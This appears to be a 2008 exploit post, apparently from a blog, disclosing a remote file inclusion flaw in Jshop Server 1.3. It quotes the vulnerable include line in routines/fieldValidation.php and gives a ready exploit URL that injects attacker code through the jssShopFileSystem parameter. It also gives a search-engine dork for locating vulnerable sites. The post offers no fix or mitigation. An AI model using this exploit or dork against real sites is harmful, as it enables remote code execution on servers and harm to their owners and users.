26 February 2008

Jshop Server 1.3 RFI

--------------------------------------------------------------------------
# scripts : Jshop Server 1.3
# Discovered By : irvian
# scripts site : http://www.jshop.co.uk/
# dork : inurl:page.php?xPage=
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]




0 komentar:

powered by irvian